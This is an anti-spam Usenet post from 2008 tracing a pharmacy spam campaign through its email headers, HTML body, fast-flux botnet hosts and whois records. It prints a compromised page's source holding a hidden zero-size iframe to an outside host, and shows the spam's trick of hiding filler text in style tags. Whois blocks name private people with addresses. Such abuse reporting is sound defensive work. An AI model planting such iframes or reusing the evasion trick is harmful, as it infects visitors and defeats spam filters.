Spamvert Image Hosting URL:
http://www.dicapopipes.com.ar/share_photos.gif
www.dicapopipes.com.ar IP 200.61.58.2
(at telmex.net.ar / AT&T Argentina S.A.)
www.theirfear.com => botnet
theirfear.com Resolved to 220.214.90.180 to 58.233.67.27 to
59.149.238.83 to 65.2.233.177 to 68.50.244.32 to 69.217.48.33 to
70.230.156.188 to 71.170.85.91 to 74.128.136.74 to 78.99.218.250 to
82.212.13.213 to 84.51.86.235 to 87.228.105.211 to 123.202.78.216 to
123.202.193.70 to 124.80.101.135 to 125.130.11.140 to 211.192.194.58
to 219.240.79.58 to 220.94.144.187
Title: European Pharmacy (aka Canadian Pharmacy)
WEB:
(c) Copyright Canadian Pharmacy, 2003-2008. All Rights Reserved.
Much More Canadian Pharmacy sightings:
http://groups.google.com/groups/search?q=%22Canadian+Pharmacy%22+group%3A*abuse&start=0&scoring=d&
Plenty of Forged Certificates and logos as always.
SEE sender identity and headers forgery by spammer spoofing our
domain.
Much More info below:
==================X-SID-PRA: Weekly News <[MUNGED]>
X-Message-Info: 6sSXyD95QpXovcc6h/
ma5IMw7UkL2VHPoHSef5c91Lcdd8jz7Ric6GKvReA7qkvcaV35qp5rC4RiSqW/hNwWPQ=Received: from tomts49-srv.bellnexxia.net ([209.226.175.193]) by bay0-
pamc1-f1.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.2444);
Fri, 4 Apr 2008 03:43:32 -0700
Received: from toip19.srvr.bell.ca ([67.69.240.21])
by toip51.srvr.bell.ca with ESMTP; 04 Apr 2008 06:43:30 -0400
Received: from [MUNGED]
by toip19.srvr.bell.ca with ESMTP; 04 Apr 2008 06:43:30 -0400
Received: (qmail 3182 invoked by uid 110); 4 Apr 2008 06:43:29 -0400
Delivered-To: [MUNGED]
Received: (qmail 3176 invoked from network); 4 Apr 2008 06:43:29 -0400
Received: from eth-221.160-homell.natm.ru (HELO Natali)
(84.242.221.160)
by [MUNGED] with SMTP; 4 Apr 2008 06:43:29 -0400
Received: (qmail 31515 by uid 512); Fri, 4 Apr 2008 02:43:36 +0300
Message-Id: <20080404054336.31517.qmail@Natali>
To: <[MUNGED]>
Subject: Hot Alert [MUNGED]
From: Weekly News <[MUNGED]>
Content-Type: text/html
X-Antivirus: avast! (VPS 080404-0, 04.04.2008), Outbound message
X-Antivirus-Status: Clean
Date: Fri, 4 Apr 2008 06:43:31 -0400
Return-Path: anmcon...@yahoo.com
X-OriginalArrivalTime: 04 Apr 2008 10:43:32.0151 (UTC)
FILETIME=[B9EDEC70:01C89640]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://
www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<style>
<h3>The Discovery of the Ajan Treasures</h3>
<p>One day, 14-year-old Jessica Hoshi and her friends Shannon, Ranko,
Talitha and Alanna found a mysterious trunk in the attic of Jessica's
house sealed with a magical lock.</p>
<p>With only a touch, Jessica opened the lock and discovered what was
hidden inside. She found a beautiful jewelry box containing five
priceless enchanted artifacts known as the Ajan Treasures.</p>
<p>Jessica and her friends later learned the Ajan Treasures are
legendary weapons in disguise: weapons that give her and her friends
the power to transform into magical warriors, each with different
abilities.</p>
<p>Alanna's platinum bracelet gives her the powers of snow and ice,
and she fights with an enchanted staff called the Quarterseeker.</p>
<p>Talitha's emerald barrette transmutes into living armor called the
Goldenwood Shield. She fights with the power of plants, trees and
flowers.</p>
<p>Shannon's sapphire ring becomes the Obsidian Longbow. She can use
it to transform into the Starlight Huntress and summon a midnight
black cougar to help her fight.</p>
<p>Ranko's silver necklace can transmute into Thundercaller, the
mighty iron warhammer that gives her the power of sound, lightning and
the sea.</p>
<p>Jessica's treasure is the most poweful of all! Her celestium charm
becomes Noble Aria, the golden sword with a blade that burns with the
flames of the sun! Jessica fights with the powers of light, fire and
music!</p>
<p>Jessica and her friends can wear the Ajan Treasures just like real
jewelry, so they will always have their powers and weapons ready to
transform and do battle with the evil minions of the Cryptics!</p>
<p style="font-style: italic; font-weight: bold; color: rgb(170, 0,
0); font-size: 124%;">"WOW! LadyStar just keeps getting better and
better!"<br>
<font style="font-style: italic; font-size: 70%;">Carissa</font></p>
<div style="text-align: center;">
</a><font style="margin-top: 5px; font-style: italic; color: rgb(136,
0, 136);">A spooky narrow passage through the Obsidian Cliffs near
Mudwood</font>
</div>
<p></p>
<h3>Meet new friends!</h3>
<p>Jessica Hoshi loves to play music on her saxophone, so she decided
to try out for the Tree Shores High School Marching Band, one of the
finest performance bands around.</style></p>
<a href="http://www.theirfear.com" title="link"><img src="http://
www.dicapopipes.com.ar/share_photos.gif" alt="link" border=0></a>
<p><style>On the first day of band practice, she met shy Talitha
Hayashi, who studied piano for years and joined the band as a
glockenspiel player. She also met Shannon Ka Yoru, an older band
member and second-chair trumpet player who helped lead Jessica's group
during rehearsals.</p>
<p>Second Drum Major Alanna Kawa was in charge of all the summer
rehearsals, and on the way to practice one day, Jessica met Ranko
Yorozu, an electric guitar player who volunteered for the band, but
only because she wanted to play crash cymbals.</p>
<p>Jessica was appointed an assistant drummer by Leila Hakumei, a
first-chair percussionist in the same class as Shannon, and on the way
home one day, Jessica and her friends met little Cecilia Daichi, who
watched band practice every day after school with her enormous sleepy
cat named Hikousen.</p>
<p>Jessica and her new friends spend their <b style="color: black;
background-color: rgb(255, 255, 102);">free</b> time at Doubler's
Pizza, the baseball-themed unofficially official hangout of the Tree
Shores High School Lions Marching Band. They also get to see each
other every day in the Tree Shores Band Room, where they discuss just
about everything from music to parties, video games, hobbies and
friends.</p>
<p>Whether its Jessica's latest fishing adventures or cooking
disasters, Ranko's great sports victories or guitar riffs, Talitha's
amazing astronomical studies and nature hiking trips, Alanna's search
for the perfect pizza between Drum Major competitions, Cici's coloring
projects and video game victories, Leila's philosophical philosophies
and drumset solos, or Shannon's incredible drawings, flugelhorn and
trumpet playing, you can be sure there is always something interesting
going on at the Tree Shores High School Band Room every day!</p>
<p style="font-style: italic; font-weight: bold; color: rgb(170, 0,
0); font-size: 124%;">"I have five daughters. Finally something for
my girls."<br>
</style>
<font style="font-style: italic; font-size: 70%;">Aaron</font></p>
</body>
</html>
-- END OF SPAM --
See also European Pharmacy sightings:
http://groups.google.com/groups/search?q=%22European+Pharmacy%22+group%3A*abuse*&qt_s=Search
Identical spam as for collectwhole.com, planerise.com, seapast.com,
moonshort.com, letterclock, pleaseselect.com, liftplural.com,
samegentle.com => All Botnet
OLD Listing:
SBL61248 - ROK4932 / SBL61418, SBL61896, SBL62483
http://www.spamhaus.org/rokso/evidence.lasso?rokso_id=ROK4932
WEB:
Licensed by The College of Pharmacists of British Columbia.
If you have any questions or concerns you can contact the college at
200-1765 West 8th Ave. Vancouver, BC, Canada V6J 5C6
You may contact us at +1(210) 888-9089, please, keep your order I.D.
every time you make a call
(c) Copyright Canadian Pharmacy, 2003-2008. All Rights Reserved.
More spammer sightings:
http://groups.google.com/groups/search?q=%22September+70%25%22+group%3A*abuse&start=0&scoring=d&
See:
IP 84.242.221.160 eth-221.160-homell.natm.ru
http://moensted.dk/spam/?addr=84.242.221.160
http://spamcop.net/w3m?action=checkblock&ip=84.242.221.160
route: 84.242.192.0/18
descr: DATACOM-NET
origin: AS16301
notify: mae...@datacom.natm.ru
notify: hun...@keeper.natm.ru
mnt-by: NOVGOROD-MNT
changed: hun...@keeper.natm.ru
Spamvert:
www.theirfear.com => botnet
theirfear.com Resolved to 220.214.90.180 to 58.233.67.27 to
59.149.238.83 to 65.2.233.177 to 68.50.244.32 to 69.217.48.33 to
70.230.156.188 to 71.170.85.91 to 74.128.136.74 to 78.99.218.250 to
82.212.13.213 to 84.51.86.235 to 87.228.105.211 to 123.202.78.216 to
123.202.193.70 to 124.80.101.135 to 125.130.11.140 to 211.192.194.58
to 219.240.79.58 to 220.94.144.187
ns0.nameedns.com IP 211.168.219.196
ns0.nameedns.com IP 203.210.40.116
ns0.nameedns1.com IP 211.172.214.146
ns0.renewwdns.com IP 123.202.89.194
ns0.renewwdns.com IP 219.240.79.58
ns0.renewwdns1.com IP 124.49.113.109
www.theirfear.com has no MX records -> theirfear.com has no MX records
See IP rDNS on botnet:
220.214.90.180 = zd090180.ppp.dion.ne.jp
58.233.67.27 no PTR at HANARO / HANANET / HANANET / Korea
59.149.238.83 = 059149238083.ctinets.com
65.2.233.177 = adsl-2-233-177.mia.bellsouth.net
68.50.244.32 = c-68-50-244-32.hsd1.dc.comcast.net
69.217.48.33 = ppp-69-217-48-33.dsl.applwi.ameritech.net
70.230.156.188 = adsl-70-230-156-188.dsl.stlsmo.sbcglobal.net
71.170.85.91 = static-71-170-85-91.dllstx.fios.verizon.net
74.128.136.74 = 74-128-136-74.dhcp.insightbb.com
78.99.218.250 = adsl-dyn250.78-99-218.t-com.sk
82.212.13.213 = hsi-kbw-082-212-013-213.hsi.kabelbw.de
84.51.86.235 no PTR at trc-odintsovo.ru / odintsovo.info
87.228.105.211 no PTR at ZAO "Infoline" / infoline.su / RU-MOSINFOLINE
123.202.78.216 = 123202078216.ctinets.com
123.202.193.70 = 123202193070.ctinets.com
124.80.101.135 no PTR at GINAMHANVITNET / naver.com / tbroad.com /
Korea
125.130.11.140 no PTR at KORnet / kt.co.kr / Korea
211.192.194.58 no PTR at KORnet / kt.co.kr / Korea
219.240.79.58 no PTR at HANANET-HIGHBAN-INTERNETCLUBTZ / hanaro.com /
Korea
220.94.144.187 no PTR at KORnet / kt.co.kr / Korea
AND:
IP 211.168.219.196 no PTR at BORANET / LG DACOM / Korea
IP 203.210.40.116 no PTR at Vitssen-INFRA / GSD / tbroad.com / Korea
IP 211.172.214.146 no PTR at KNCTV / gsgbi.co.kr / Korea
IP 123.202.89.194 = 123202089194.ctinets.com
IP no PTR at HANANET-HIGHBAN-INTERNETCLUBTZ / hanaro.com / Korea
IP 124.49.113.109 no PTR at Xpeed / powercomm.com / Korea
Let see whois.paycenter.com.cn:
Domain Name: theirfear.com
Registrant:
given
417 W 6th St
Administrative Contact:
given sa
given
417 W 6th St
muncie
United States
tel: 86 0 8969577
fax: 86 0 8969577
locatetwotits[]gmail.com
Technical Contact:
given sa
given
417 W 6th St
muncie
United States
tel: 86 0 8969577
fax: 86 0 8969577
locate...@gmail.com
Billing Contact:
given sa
given
417 W 6th St
muncie
United States
tel: 86 0 8969577
fax: 86 0 8969577
locate...@gmail.com
Registration Date: 2008-02-20
Update Date: 2008-03-13
Expiration Date: 2009-02-20
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 203.210.40.116
More theirfear.com sightings:
http://groups.google.com/groups/search?q=theirfear.com+group%3A*abuse*&qt_s=Search
Spamvert Image Hosting URL:
http://www.dicapopipes.com.ar/share_photos.gif
Source Code:
HTTP/1.1 200 OK
Date: Fri, 04 Apr 2008 14:15:47 GMT
Server: Apache/1.3.33 (Unix) FrontPage/5.0.2.2635 mod_throttle/3.1.2
mod_layout/3.2 PHP/4.3.10
Last-Modified: Tue, 04 Mar 2008 11:09:46 GMT
ETag: "120fb58-76-47cd2dfa"
Accept-Ranges: bytes
Content-Length: 118
Connection: close
Content-Type: text/html
<!-- ~ --><iframe src="http://dilonius.net/counter/index.php"
width="0" height="0" frameborder="0"></i
See:
www.dicapopipes.com.ar IP 200.61.58.2
merapi.switch.ch IP 130.59.211.10
athea.ar IP 200.16.98.2
ctina.ar IP 200.16.97.17
ns1.retina.ar IP 200.10.202.3
relay1.mecon.gov.ar IP 168.101.16.10
a.ns.dicapopipes.com.ar IP 200.61.58.1
b.ns.dicapopipes.com.ar IP 200.61.58.2
MX
a.mx.dicapopipes.com.ar IP 200.61.58.1
www.dicapopipes.com.ar has no MX records -> [dicapopipes.com.ar has 1
MX record a.mx.dicapopipes.com.ar (0)]
http://moensted.dk/spam/?addr=200.61.58.2
http://dnsbl.net.au/lookup/?200.61.58.2
inetnum: 200.61.32/19
status: allocated
owner: AT&T Argentina S.A.
ownerid: AR-KLSA-LACNIC
responsible: Juan Pablo Romero Lopez
e-mail: juanpabl...@TELMEX.COM
address: Garay, 34,
address: C1063AB - Buenos Aires -
country: AR
route: 200.61.32.0/19
descr: TELMEX-NET11-TO-NET14
origin: AS11664
mnt-by: MAINT-AS11664
changed: interne...@telmex.com
route: 200.61.58.0/24
descr: Metrored
descr: Proxy-registered route
origin: AS26623
mnt-by: MAINT-AS6140
changed: ad...@impsat.com
Let see whois at nic.ar:
Entidad Registrante: So&ora Granda, Jose Adrian
País: Argentina
Actividad: Electronica
Datos en Argentina
Domicilio: Chivilcoy 4885
Ciudad/Localidad: Autonoma de Buenos Aires
Provincia: Buenos Aires
Código Postal: 1419
Teléfono: 4501-7578
Fax: 4501-7578
Persona Responsable: Marcela Blanco
Domicilio: Juramento5177
Ciudad: Capital Federal
Código Postal: 1100
Provincia:
País: Argentina
Teléfono: 4501-7578
Fax: 45017578
Horario de contacto: 8 a 20
Entidad Administradora: Unlugar S.A.
Domicilio: Bauness 1068
Ciudad: Capital Federal
Código Postal: C1427BCN
Provincia:
País: Argentina
Teléfono: 4524-3922
Fax: 4521-2304
Actividad: Hosting Gratuito, ISP
Contacto Técnico: Unlugar S.A. - Contacto Tecnico
Domicilio: Bauness 1068
Ciudad: Capital Federal
Código Postal: C1427BCN
Provincia:
País: Argentina
Teléfono: 4524-3922
Fax: 4521-2304
Horario de contacto: 9,00 a 18,00
Servidores DNS:
DNS Primario: Nombre:ns1.unlugar.com
Dirección IP:
DNS Secundario: Nombre:ns2.unlugar.com
Dirección IP:
More dicapopipes.com.ar sightings:
http://groups.google.com/groups/search?q=dicapopipes.com.ar+group%3A*abuse*&qt_s=Search
Let see whois.paycenter.com.cn:
Domain Name: nameedns.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More nameedns.com sightings:
http://groups.google.com/groups/search?q=nameedns.com+group%3A*abuse*&qt_s=Search
Let see whois.paycenter.com.cn:
Domain Name: nameedns1.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More nameedns1.com sightings:
http://groups.google.com/groups/search?q=nameedns1.com+group%3A*abuse*&qt_s=Search
Let see whois.paycenter.com.cn:
Domain Name: renewwdns.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More renewwdns.com sightings:
http://groups.google.com/groups/search?q=renewwdns.com+group%3A*abuse*&qt_s=Search
Let see whois.paycenter.com.cn:
Domain Name: renewwdns1.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More renewwdns1.com sightings:
http://groups.google.com/groups/search?q=renewwdns1.com+group%3A*abuse*&qt_s=Search
Read more:
http://groups.google.com/group/news.admin.net-abuse.email/msg/83df9a75a123645e
And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/759359adfc45d074
And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/49642b0bd30a4c3a
Cheers, Tomez
--
All postings to news.admin.net-abuse.sightings are unconfirmed and unverified
unless stated otherwise by the moderators. All opinions expressed above are
considered the opinions of the original poster, not the moderators or their
respective employers. For a copy of the guidelines to this group, see:
http://www.killfile.org/~tskirvin/nana/